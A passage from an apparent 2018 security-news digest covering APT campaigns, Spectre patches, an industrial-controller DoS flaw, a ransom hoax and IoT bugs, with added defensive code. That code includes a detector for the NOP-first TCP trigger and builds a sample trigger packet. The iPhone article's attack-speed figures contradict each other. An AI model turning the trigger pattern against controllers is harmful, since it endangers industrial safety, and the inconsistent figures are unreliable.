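    return ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6", use_errno=True)


def process_ssb_state():
    """This process's SSB state, or None where prctl is unavailable (non-Linux, old kernel)."""
    try:
        res = _libc().prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, 0, 0, 0)
    except (OSError, AttributeError):
        return None
    return None if res < 0 else describe_spec_flags(res)


def disable_ssb_for_process():
    """Opt this process (inherited by its children) into the mitigation; it cannot be undone."""
    try:
        return _libc().prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS,
                             PR_SPEC_FORCE_DISABLE, 0, 0) == 0
    except (OSError, AttributeError):
        return False


if __name__ == "__main__":
    print("sysfs:", ssb_status(read_sysfs_status()))
    print("this process before:", process_ssb_state())
    print("disable:", disable_ssb_for_process())
    print("this process after:", process_ssb_state())
```

A status of "opt_in" after the update is the expected state, not a failed patch; a status of "vulnerable" with the kernel update applied means the Intel microcode half is still missing.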

Oracle promptly addressed the initial Meltdown and Spectre vulnerabilities in January 2018 Critical Patch Update just after their disclosure.

Since January, other side-channel attacks have been discovered, including BranchScope, SgxPectre, and the attacks against the System Management Mode (SMM) memory.


China Tick APT group targeting air-gapped systems in Asia
26.6.2018 securityaffairs APT

Palo Alto Networks experts uncovered a new operation conducted by the cyber espionage group known as Tick APT that has been targeting a secure USB drive built by a South Korean defense company.
The Tick APT group, also tracked as Bronze Butler, has been active for at least a decade; it was first publicly documented in 2016 by Symantec, and experts believe it is a China-linked threat actor. Experts have highlighted the group’s ability to discover zero-day flaws in software used in specific regions, such as Japan and South Korea.

The group has been targeting a secure USB drive built by a South Korean defense company, likely with the intent of compromising air-gapped systems.

The experts reported that the Tick APT group is mainly targeting Japan and South Korea, but the threat actor has also targeted organizations in Russia, Singapore, and China.

The group has been observed using a variety of proprietary tools and custom malware, including Minzen, Daserf (aka Nioupale), Datper, and HomamDownloader.

“Recently, Palo Alto Networks Unit 42 discovered the Tick group targeted a specific type of secure USB drive created by a South Korean defense company.” reads the analysis published by PaloAlto Networks.

“The weaponization of a secure USB drive is an uncommon attack technique and likely done in an effort to spread to air-gapped systems, which are systems that do not connect to the public internet.”

The malicious code used in the recent attacks conducted by the Tick APT were specifically developed to target systems running Windows XP or Windows Server 2003.

According to the experts, the malware was developed to infect older, out-of-support versions of Microsoft Windows running on air-gapped systems, which are often used in government and defense environments.

The experts added that they have not found any public reports of the attack, likely because the threat actor used it many years ago.

“We have not identified any public reporting on this attack, and we suspect the Tick group used the malware described in this report in attacks multiple years ago. Based on the data collected, we do not believe this malware is part of any active threat campaign.” continues the report.

The experts believe the hackers managed to compromise the secure USB drive model and load the malware onto an unknown number of devices, which are supposed to be certified as secure by the South Korean ITSCC.

PaloAlto Networks reported that the APT group also developed a strain of malware dubbed SymonLoader that, once installed on older Windows machines, looks for the specific USB drives.

The SymonLoader was used by attackers to load and execute the malware from the secure USB drive. At the time it is not clear how the attackers have compromised the USB drives.

“Because we do not have either a compromised USB drive or the unknown malicious file, we are also unable to determine how these USB drives have been compromised.” continues Palo Alto.

“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering.”


During the investigation, experts at Palo Alto Networks discovered an interesting sample on January 21, 2018: a Trojanized version of a Japanese-language Go game that drops the malware.

Experts associated this sample with the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs.

“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.

Further details, including the IoCs are reported in the analysis published by the experts.
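Both reports above make the same forensic point: the payload was hidden in sectors past the end of the drive's filesystem, where ReadFile() never looks and only LBA/SCSI-level reads reach it. The following is an added example, not Palo Alto Networks' tooling or anything from the Tick toolset: given a raw image of a removable drive (for instance one taken with dd), it parses the MBR partition table, walks the sectors after the last partition, and reports whether that unallocated tail holds non-zero, high-entropy data of the kind an encrypted blob would leave. The 64-sector test image, its single FAT32 partition and the hash-chain stand-in for an encrypted payload are constructed for the example; the 6 bits/byte entropy threshold is the author's assumption.

```python
import hashlib
import math
import struct

SECTOR = 512


def parse_mbr_partitions(image):
    """Return (start_lba, sector_count) for every non-empty entry in the MBR partition table."""
    if len(image) < SECTOR or image[510:512] != b"\x55\xaa":
        raise ValueError("no MBR boot signature")
    parts = []
    for i in range(4):
        entry = image[446 + 16 * i:446 + 16 * (i + 1)]
        ptype = entry[4]
        start_lba, count = struct.unpack_from("<II", entry, 8)
        if ptype != 0 and count:
            parts.append((start_lba, count))
    return parts


def shannon_entropy(data):
    """Bits per byte: encrypted or compressed data sits near 8, zero fill at 0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_trailing_data(image, min_entropy=6.0):
    """Inspect the sectors after the last partition, the region SymonLoader reads by LBA."""
    parts = parse_mbr_partitions(image)
    total_sectors = len(image) // SECTOR
    tail_start = max(s + c for s, c in parts) if parts else 1
    tail = image[tail_start * SECTOR:total_sectors * SECTOR]
    nonzero = [tail[i:i + SECTOR] for i in range(0, len(tail), SECTOR) if any(tail[i:i + SECTOR])]
    entropy = shannon_entropy(b"".join(nonzero))
    return {
        "tail_start_lba": tail_start,
        "tail_sectors": len(tail) // SECTOR,
        "nonzero_sectors": len(nonzero),
        "entropy": round(entropy, 2),
        "suspicious": bool(nonzero) and entropy >= min_entropy,
    }


def analyze_image_file(path):
    """Run the check on a raw image file taken from the removable drive."""
    with open(path, "rb") as f:
        return find_trailing_data(f.read())


def build_test_image(hidden=b""):
    """Constructed 64-sector image: one FAT32 partition (LBA 1..48), optional payload at the end."""
    img = bytearray(64 * SECTOR)
    entry = bytes([0x00, 0, 0, 0, 0x0C, 0, 0, 0]) + struct.pack("<II", 1, 48)
    img[446:462] = entry
    img[510:512] = b"\x55\xaa"
    if hidden:
        img[-len(hidden):] = hidden
    return bytes(img)


# Stand-in for an encrypted payload: 2048 pseudo-random bytes from a hash chain, not real malware.
FAKE_ENCRYPTED_PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))

if __name__ == "__main__":
    print(find_trailing_data(build_test_image()))
    print(find_trailing_data(build_test_image(FAKE_ENCRYPTED_PAYLOAD)))
```

The image has to come from a raw block read of the whole device; copying the files off the drive, or imaging only the partition, would miss exactly the region the loader uses.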


Lazarus APT hackers leverages HWP Documents in a recent string of attacks
26.6.2018 securityaffairs APT

Security researchers at AlienVault uncovered a series of cyber attacks on cryptocurrency exchanges leveraging weaponized Hangul Word Processor (HWP) documents.
The string of attacks involving the HWP documents has been attributed to the North Korea-linked Lazarus APT group, and includes the hack of the South Korean virtual currency exchange Bithumb. The hackers managed to steal roughly $32 million worth of cryptocurrencies. It was the second security breach suffered by the exchange, and it forced a shutdown of the service; the first attack was also attributed to the Lazarus APT group.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

Recently the group hit several banks in Latin America stealing tens of millions of dollars.

Earlier this month, experts at AlienVault reported that Lazarus APT has been leveraging an ActiveX zero-day vulnerability in attacks on South Korean targets.

A couple of days ago, experts at AlienVault discovered a series of weaponized documents targeting members of a recent G20 Financial Meeting.

“One malicious document appears to be targeting members of a recent G20 Financial Meeting, seeking coordination of the economic policies between the wealthiest countries. Another is reportedly related to the recent theft of $30 million from the Bithumb crypto-currency exchange in South Korea.” reads the analysis published by Alien Vault.

The HWP documents used in recent attacks include malicious PostScript code that downloads the second-stage malware (either a 32- or 64-bit version of Manuscrypt).


Reports published by South Korean organizations suggest the Bithumb heist was set up earlier, in May and June, using malicious HWP files. The documents involved fake resumes and are linked to previous attacks by Lazarus.

“A report by a South Korean news organisation into the investigation by a South Korean security company into the thefts shows some very familiar looking malware samples that were sent to cryptocurrency organisations” continues Alien Vault.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,”

According to the experts, malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea in June.

The attackers are also phishing for credentials: a number of cryptocurrency phishing domains were registered with the same phone number as a domain (itaddnet[.]com) that delivered some of the malware. This is an anomaly, since in past attacks Lazarus preferred to compromise legitimate sites rather than register its own domains.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available – the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organisations have the double impact of weakening their closest competitor.” concluded AlienVault

Further details, including IoCs are reported in the analysis published by AlienVault.


Rockwell Patches Flaw Affecting Safety Controllers From Several Vendors
25.6.2018 securityweek ICS  

In April, at SecurityWeek’s ICS Cyber Security Conference in Singapore, industrial cybersecurity firm Applied Risk disclosed the details of a serious denial-of-service (DoS) vulnerability affecting safety controllers from several major vendors. Rockwell Automation is one of those vendors and the company has now released patches for its products.

In an advisory published last week, Rockwell Automation informed customers that the flaw impacts Allen-Bradley CompactLogix 5370 and Compact GuardLogix 5370 programmable automation controllers, which are used to control processes in the critical infrastructure, water systems, entertainment, automotive, food and beverage, and other sectors.

The vulnerability is tracked by Rockwell as CVE-2017-9312 and it has been classified as “high severity” with a CVSS score of 8.6. CompactLogix 5370 L1, L2 and L3, and Armor CompactLogix 5370 L3 small controllers, and Compact GuardLogix 5370 and Armor Compact GuardLogix 5370 L3 safety controllers running firmware version 30.012 and prior are affected. The security hole has been patched with the release of version 31.011.

A remote attacker can exploit the vulnerability to cause affected devices to enter Major Non-Recoverable Fault (MNRF) mode, which results in a DoS condition that requires the user to re-download the application program in order to restore the system.

“An MNRF is a controlled action taken by the controller when it is determined that the controller could no longer continue safe operation. When a Logix controller determines that an MNRF is the right course of action, the controller is designed to fault, taking it out of run mode, logging diagnostic data, and then invalidating and deleting the controller’s memory. This action requires an application program reload to guarantee the controller has a valid program to continue safe operation,” Rockwell Automation said in an advisory (customer account required).


According to Applied Risk’s own advisory, the vulnerability exists due to “incorrect processing of TCP ACK packet additional options by the listener at Ethernet/IP TCP port (default 44818).”

“An incorrect order on the NOP option leads to an immediate device reboot and enters a ‘Major Fault’ mode which must be resolved manually. To trigger the vulnerability, the NOP option must be put first and the number of options must be more than one,” Applied Risk explained.
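To make that description concrete from the monitoring side, here is an added example (not Applied Risk's or Rockwell's code) that parses the option field of a raw TCP header and labels segments bound for the EtherNet/IP port whose option list starts with a NOP and contains more than one option, the layout the advisory describes. The two sample segments are constructed inline; the `build_tcp_header` helper, the option-name table and the `classify` labels are assumptions made for the illustration.

```python
"""Parse TCP options from a raw TCP header and flag the option layout the
Applied Risk advisory describes (NOP first, more than one option) on the
EtherNet/IP port. Added example for a passive sensor; not vendor code.
"""
import struct

ETHERNET_IP_PORT = 44818  # default EtherNet/IP TCP port named in the advisory
ACK = 0x10                # TCP ACK flag bit

# Assumed option-name table for readable output (kinds per RFC 793/7323)
OPTION_NAMES = {0: "EOL", 1: "NOP", 2: "MSS", 3: "WScale",
                4: "SACKperm", 5: "SACK", 8: "Timestamps"}


def parse_tcp_options(tcp_header: bytes):
    """Return the options of a TCP header as a list of (kind, payload) tuples.

    Kinds 0 (EOL) and 1 (NOP) are single bytes; every other kind is TLV whose
    length byte covers kind, length and payload. Parsing stops at EOL.
    Raises ValueError on a truncated header or an inconsistent length field.
    """
    if len(tcp_header) < 20:
        raise ValueError("TCP header shorter than 20 bytes")
    data_offset = (tcp_header[12] >> 4) * 4
    if data_offset < 20 or data_offset > len(tcp_header):
        raise ValueError("bad data offset")
    opts = tcp_header[20:data_offset]
    result, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                      # EOL: nothing meaningful follows
            break
        if kind == 1:                      # NOP: one-byte padding option
            result.append((1, b""))
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option kind without length byte")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        result.append((kind, bytes(opts[i + 2:i + length])))
        i += length
    return result


def matches_advisory_pattern(options) -> bool:
    """True when the first option is NOP and more than one option is present."""
    return len(options) > 1 and options[0][0] == 1


def build_tcp_header(src_port, dst_port, flags, options: bytes) -> bytes:
    """Assemble a minimal TCP header around raw option bytes (constructed sample;
    sequence numbers and checksum are left at zero because only the option
    field matters to the parser)."""
    padded = options + b"\x00" * (-len(options) % 4)   # pad to 32-bit words
    data_offset = 5 + len(padded) // 4
    fixed = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0,
                        data_offset << 4, flags, 65535, 0, 0)
    return fixed + padded


def classify(tcp_header: bytes) -> str:
    """Label a segment for a defender: destination port plus option pattern."""
    dst_port = struct.unpack("!H", tcp_header[2:4])[0]
    try:
        opts = parse_tcp_options(tcp_header)
    except ValueError as err:
        return f"malformed options ({err})"
    names = ",".join(OPTION_NAMES.get(k, str(k)) for k, _ in opts)
    if dst_port == ETHERNET_IP_PORT and matches_advisory_pattern(opts):
        return f"ALERT port {dst_port}: NOP-first option list [{names}]"
    return f"ok port {dst_port}: [{names}]"


# Constructed samples: an ACK carrying only a Timestamps option (kind 8, len 10),
# and an ACK whose option list begins with a NOP followed by Timestamps.
PLAIN_ACK = build_tcp_header(50000, ETHERNET_IP_PORT, ACK,
                             b"\x08\x0a" + b"\x00" * 8)
NOP_FIRST_ACK = build_tcp_header(50000, ETHERNET_IP_PORT, ACK,
                                 b"\x01\x08\x0a" + b"\x00" * 8)

if __name__ == "__main__":
    for segment in (PLAIN_ACK, NOP_FIRST_ACK):
        print(classify(segment))
```

One caveat before wiring this into a sensor: several mainstream TCP stacks pad ordinary segments with NOPs ahead of the Timestamps option, so the pattern on its own will match plenty of legitimate traffic. Scope it to the manufacturing-zone boundary and to sources that have no business talking to controllers, and treat hits as a prompt to confirm the firmware update and the traffic-blocking advice below rather than as proof of an attack.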

In addition to applying firmware updates, Rockwell has advised customers to block all traffic to Ethernet/IP and other CIP protocol-based devices from outside the manufacturing zone, minimize network exposure for control systems, and use VPNs where remote access is required.

Since the underlying issue that causes the vulnerability is related to Ethernet/IP, one of the most widely used industrial network protocols, researchers believe products from other vendors are likely affected as well. No other companies have been singled out, but Applied Risk did reveal at the ICS Cyber Security Conference that its researchers tested safety controllers from several major vendors, including Siemens, ABB, Pilz, and Phoenix Contact.

Given the significant role of safety controllers in industrial environments, causing a device to enter a DoS condition could have serious consequences, including physical damage to equipment and physical harm to people, experts warned.

“The impact of such an attack would be highly dependent on the nature of the attack, the design of the control system and other controls a user may have in place,” Rockwell said.


UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.2018 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

Her Majesty’s Revenue and Customs collected these voice records via the Voice ID service that was launched in January 2017. The service was created to allow UK citizens to authenticate with their voice when calling HMRC call centers.

When the service was initially launched, the tax agency claimed users would be able to opt out of using it and continue to authenticate themselves by using usual methods.

The Big Brother Watch group discovered that there’s no opt-out option when users call the agency support line.

Every citizen accessing the service recorded a voice track to be used with the Voice ID authentication feature.

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database,” reads the Big Brother Watch report.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Advocates at the Big Brother Watch group claim that HMRC is breaking the law because it doesn’t provide a clear way of opting out and because there is no way to ask the agency to remove a voice track from HMRC’s database.

Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide instructions to users on how to delete their voice tracks from HMRC’s database.


Another aspect that is still under investigation is how the agency manages voice tracks and if it shares them with third-parties and government agencies.

It is clear that Her Majesty’s Revenue and Customs is not in compliance with the GDPR regulation that was adopted by EU member states.

Big Brother Watch officials are inviting Britons to file a complaint with HMRC and with the UK’s Information Commissioner’s Office (ICO); the latter has already started an official investigation into HMRC’s process.


CSE Malware ZLab – A new variant of Ursnif Banking Trojan served by the Necurs botnet hits Italy
25.6.2018 securityaffairs
Virus

Malware researchers from CSE Cybsec ZLab discovered a missing link between the Necurs botnet and a variant of the Ursnif trojan that recently hit Italy.
Starting from 6 June, a new version of the infamous banking trojan Ursnif has been hitting Italian companies. The malware is well known to the cybersecurity community: the Ursnif banking Trojan was the most active malware code in the financial sector in 2016, and the trend continued through 2017 to date.

In previous campaigns, the Ursnif banking Trojan targeted users in Japan, North America, Europe and Australia; later the authors improved their evasion techniques to target users worldwide, especially in Japan.

The malware is able to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites.

The malware has been active since at least 2009, as reported by Microsoft.

The technical information reported by Microsoft refers to an older version of the malware, but the version that is spreading in Italy presents many improvements.

CSE Cybsec ZLab researchers are conducting analysis on the latest version of the malware. The experts started the investigation after the discovery of a suspicious file that was used in a targeted attack against one of its customers.

The attachment used in the campaign that hit Italian companies is a weaponized Microsoft Word document; it uses a social engineering technique to trick users into enabling macros, supposedly to view its content correctly.

Ursnif phishing Word document screen

Moreover, once Ursnif has infected a new machine, it will attempt to spread to every contact in the address book of the compromised email account.

In order to trick the victim into opening the malicious email, the message is presented as the reply to an existing conversation conducted by the victim in the past.

While investigating the domains involved in the last phishing campaign against the Italian companies, the researchers discovered many of them were registered by the same email address, “whois-protect[@]hotmail[.]com.”

This email address is directly connected to the infamous Necurs botnet, the malicious infrastructure that was used in past months to push many other malware families, including Locky, Jaff, GlobeImposter, Dridex, Scarab and Trickbot.

Further details on the variant of the Ursnif malware that targeted Italian firms, including IoCs and Yara rules, are available in the report published by researchers at ZLab.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180621_CSE_Ursnif-Necurs_report.pdf


Oracle Patches New Spectre, Meltdown Vulnerabilities
25.6.2018 securityweek   
Vulnerability

Oracle announced on Friday that it has started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown vulnerabilities.

Intel, AMD, ARM, IBM, Microsoft and other major tech companies last month coordinated the disclosure of two new variants of the speculative execution attack methods known as Meltdown and Spectre.

One of them, dubbed Variant 4, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. The second flaw, tracked as Variant 3a and CVE-2018-3640, is a Rogue System Register Read issue first documented by ARM back in January.

Variant 4 and Variant 3a have been rated “medium severity” and exploitation requires local access to the targeted system, Eric Maurice, director of security assurance at Oracle, noted in a blog post.

Maurice says Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel. According to Oracle’s advisory, Variant 4 impacts Oracle Linux versions 6 and 7, and Oracle VM 3.4.

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,” Maurice said.

Oracle patched the initial Meltdown and Spectre vulnerabilities in many of its products with the release of the January 2018 Critical Patch Update.

IBM has also released both operating system and firmware updates to patch Variant 4 in its Power Systems clients. Microsoft did implement some mitigations, but the company claims it has yet to identify any code patterns – in either its software or cloud services – that would allow Variant 4 attacks.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


WannaSpam – Beware messages from WannaCry-Hack-Team, it is the last hoax
25.6.2018 securityaffairs
Spam  Ransomware

WannaSpam – Many users have received a mysterious message that claims their PC was infected by WannaCry Ransomware. Crooks ask victims to pay a ransom, but it’s a scam.
Many users have received a mysterious message from a group that called itself the “WannaCry-Hack-Team” that claims that WannaCry Ransomware has returned.

The mail informs the recipients that their computer has been infected and asks them to pay a ransom to avoid their files being deleted.


This is a classic spam campaign that leverages the notoriety of the WannaCry ransomware; for this reason, experts tracked it as WannaSpam.

The recipient’s computer is not infected so they only need to ignore the message and delete it.

On Reddit, users reported having received WannaSpam messages; the emails use different subjects to trick victims into paying the ransom.

Some of the subjects used are “!!!Attantion WannaCry!!!”, “!!!WannaCry-Team Attantion!!!”, “Attantion WannaCry”, “WannaCry Attantion!”, or “WannaCry-Team Attantion!!!”.

Experts noticed a typo in the word “Attention”, which is spelled “Attantion” in the email messages.

The spammers ask victims to pay a 0.1 bitcoin ransom; once the victims have made the payment, they will be instructed to send an email to support_wc@bitmessage.ch.
If the recipients do not pay the ransom, their data will supposedly be deleted within 24 hours.

The expert Lawrence Abrams from BleepingComputer, who reported the news, also published a number of bitcoin addresses used by the crooks behind the WannaSpam campaign.

Below are some of the bitcoin addresses used by the crooks:

1Mvz5SVStiE6M7pdvUk9fstDn1vp4fpCEg
16Tq8gaad5FJ3c6mrC86e1pmqQ666dYSvv
13AEiPcnqHRRwbJRUsPLbcgX3roTTPGSMu
15TxgGK5AMvdeupbcKbk3g36zctnS9ThnU
1FXZ9yoagBMnnrkZscQzKnC2hkgX5uDgUR
The good news is that, at the time of writing, no users have been deceived by WannaSpam; nevertheless, it is very important to spread the news about this new malicious initiative.

Below an example of WannaSpam message:

From: WannaCry-Hack-team [redacted]
Sent: 21 June 2018 10:36
To: [REDACTED]
Subject: WannaCry Attantion!

Hello! WannaCry returned! All your devices were cracked with our program installed on them. We have made improvements for operation of our program, so you will not be able to regain the data after the attack.

All the information will be encrypted and then erased. Antivirus software will not be able to detect our program, while firewalls will be impotent against our one-of-a-kind code.

Should your files be encrypted, you will lose them forever.

Our program also outspreads through the local network, erasing data on all computers connected to the network and remote servers, all cloud-stored data, and freezing website operation. We have already deployed our program on your devices.

Deletion of your data will take place on June 22, 2018, at 5:00 - 10:00 PM. All data stored on your computers, servers, and mobile devices will be destroyed. Devices working on any version of Windows, iOS, macOS, Android, and Linux are subject to data erasion.

In order to ensure against data demolition, you can pay 0.1 BTC (~$650) to the bitcoin wallet: 1Mvz5SVStiE6M7pdvUk9fstDn1vp4fpCEg

You must pay in due time and notify us about the payment via email until 5:00 PM on June 22, 2018. After payment confirmation, we will send you instructions on how to avoid data erasion and such situations in future. In case you try to delete our program yourself, data erasion will commence immediately.

To pay with bitcoins, please use localbitcoins.com or other similar services, or just google for other means. After payment write to us: support_wc@bitmessage.ch

If you receive a WannaSpam email, delete it!


A hacker devised a method to unlock any iPhone and iPad device
25.6.2018 securityaffairs Apple

A security researcher has devised a method to brute force a passcode on every Apple iPhone or iPad, even the up-to-date ones.
Since iOS 8 rolled out in 2014, iPhone and iPad devices have been protected with encryption; without the passcode it is practically impossible to unlock the device.

If a wrong passcode is entered more than 10 times, the Apple device is wiped.

Now the security researcher Matthew Hickey, co-founder of Hacker House, devised a technique to bypass the limitation of the number of wrong passcodes, even on the latest iOS version (iOS 11.3).

Hacker Fantastic (@hackerfantastic) on Twitter, 9:16 PM, Jun 22, 2018:

Apple IOS <= 12 Erase Data bypass, tested heavily with iOS11, brute force 4/6digit PIN's without limits (complex passwords YMMV) https://vimeo.com/276506763 - demo of the exploit in action.

Newer Apple devices implement a hardware-based component that is isolated from the main processor to provide an extra layer of security; it is also used to keep count of the number of wrong passcodes the user has entered, and it gets slower at responding with each failed attempt.

Hickey explained that when an iPhone or iPad is plugged in, every keyboard input is managed by the device with the highest priority over other processes on the device.

“If you send your brute-force attack in one long string of inputs, it’ll process all of them, and bypass the erase data feature,” he told ZDNet.

If the attacker sends all the passcodes in one single string by enumerating each code from 0000 to 9999 with no spaces, the iOS gives the keyboard input routine priority over the device’s data-erasing feature. This implies that this trick works only after the device is booted up because there are more routines running.

The attack technique devised by Hickey can be effective against devices protected with six-digit passcodes, but it is slow: at roughly three to five seconds per passcode, or a little over a hundred four-digit codes in an hour, it would take weeks to unlock the device.


Hickey reported the bug to Apple but still hasn’t received any reply; he also published a video PoC of his attack.

“I suspect others will find it — or have already found it,” Hickey said.

Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its devices: it will lock down the iPhone’s data port to prevent unauthorized access. Experts observed that, as a result, the password-cracking tools used by forensics experts will no longer be effective.


Vulnerabilities in Fredi Wi-Fi baby monitor can be exploited to use it as a spy cam
25.6.2018 securityaffairs
Vulnerability

Vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.
Security researchers at SEC Consult discovered that vulnerabilities in the Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.


The investigation started when a mother from South Carolina USA, Jamie Summitt, claimed someone had taken control over the baby monitor.

Many commercial surveillance products leverage a “P2P cloud” feature that is enabled by default. Every device connects to a cloud server infrastructure and keeps this connection up. Mobile devices and desktop applications can connect to the camera via the cloud.

This architecture makes it easier for users to interact with the camera, no firewall rules, port forwarding rules or DDNS setup are required on the router. But this approach has many security drawbacks as highlighted by the researchers:

The cloud server provider gets all the data (e.g. video streams that are viewed).
Open questions: Who runs these servers? Where are they located? Do they comply with local jurisdiction, e.g. also EU GDPR?
If the data connection is not properly encrypted, anyone who can intercept the connection is able to monitor all data that is exchanged.
The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the “P2P Cloud”.
The experts discovered that the P2P service connects directly to the cloud and can be accessed with no more than an 8-digit device number and a shared default password.

This means that anyone accessing the online portal could enter random device numbers together with the default password to view camera feeds.

“Unfortunately the device ID does not look very secure,” reads the post published by the researchers.

“Plus the default password is neither randomly generated nor device-specific. Unless the user has changed the password to a secure one, anyone can log in and interact with the camera by ‘trying’ different cloud IDs.”

SEC Consult researchers added that insecure Fredi Wi-Fi baby monitors could also be used by hackers as an entry point in the home networks that host them.

“The ‘P2P Cloud’ feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the ‘P2P Cloud’.” continues the report.

Is the problem limited to the Fredi Wi-Fi baby monitor?

Unfortunately no, because the Chinese company that provided the firmware for the Fredi baby monitors develops generic camera control apps for many other devices.

“Obviously, the device and the cloud service is not GDPR compliant.” conclude the experts.

“It seems that consumer electronics with opaque supply chains, paired with insecure, built-in cloud features that are enabled by default will keep us busy in the future.”

The experts also published IoCs to detect the presence of devices using the Gwelltimes “Cloud-Links” platform in infrastructure.


Modern OSs for embedded systems

24.6.2018 Kaspersky OS
A review from KasperskyOS developers
At Kaspersky Lab we analyze the technologies available on the cybersecurity market, and this time we decided to look at what OS developers are offering for embedded systems (or, in other words, the internet of things). Our primary interest is how and to what degree these OSs can solve cybersecurity-related issues.

We’d like to point out that this review reflects the author’s subjective opinion, and for the purposes of this analysis we developed our own classification of OSs.

Moreover, throughout this research we have compared other operating systems with KasperskyOS to see what we can learn from them and how we can improve KasperskyOS. The results of this comparison will also be presented in this article.

We analyzed a total of several dozen operating systems, from the most widespread to some niche players. The vast majority of the operating systems we looked at primarily handle practical functional tasks. Information security features, if they are included in the design, are merely extensions to the existing functionality in the form of plugins, components implementing encryption algorithms or add-in architecture. These measures can help improve the overall information security posture of a solution, but cannot guarantee protection from all modern threat models. If cybersecurity issues are not addressed in the initial design, it inevitably leads to compromises later when protection mechanisms are added.

Operating systems can be classified according to numerous criteria. Our approach was to treat operating systems from an architecture standpoint, so we classified them into four large classes according to their kernel types.

monolithic systems,
operating systems with monolithic kernels,
microkernel-based operating systems,
hybrid systems.
Monolithic systems
This is the most widespread type of operating system architecture for embedded devices. Most of the operating systems we analyzed are monolithic environments designed to work in microcontrollers where all processes (both user and system) run in a single address space without restrictions.

From an information security standpoint, this architecture is only suitable for very simple tasks – as the functionality becomes more complex, the risk of vulnerabilities becomes too great. Whenever vulnerabilities occur in such systems, whether it’s in implementations of system services or in an auxiliary application, this leads to the entire solution being compromised.

Libraries containing sets of encryption algorithms are usually offered as extra security measures for such operating systems. However, these measures can hardly be described as sufficient, because they don’t envisage a comprehensive solution to many important issues, such as the generation and storage of keys and certificates, ensuring trusted downloads, secure updates, etc. Also, because these libraries are created specifically for the appropriate operating systems, they often don’t undergo verification and/or sufficient testing, so they themselves may contain vulnerabilities and therefore reduce (rather than improve) the overall security of the solutions they’re part of.

Other measures (such as stack protection, various types of additional checks etc.) may ensure protection against different types of failures and errors, but they are often useless at protecting against targeted attacks that exploit known vulnerabilities within the system.

Even if a microkernel architecture was formally applied in a solution like this, an acceptable level of protection is impossible to ensure unless user processes are isolated from system processes, since any user process could affect the operation of the microkernel. Examples of microkernel operating systems in which processes are not isolated properly include the popular RIOT OS, Zephyr, Unison RTOS, and even the commercial microcontroller kernel µ-velOSity provided by Green Hills, as well as Microsar OS, the basic operating system for automotive solutions provided by Vector.

Despite all the security shortcomings of monolithic systems, such compact operating systems are suitable for work in cheap microcontrollers. They can be used in simple and compact devices where the only task is to measure a single parameter, such as temperature, pressure, volume, etc. Devices like these must be simple, compact and cheap. In our view, monolithic systems are not the best option when faced with tasks that are more complex.

Monolithic kernel systems
Monolithic kernel systems are another type of operating system architecture. This is perhaps the most widespread and popular type of operating system architecture both for embedded systems and for general-purpose systems (i.e. servers, workstations and mobile devices.)

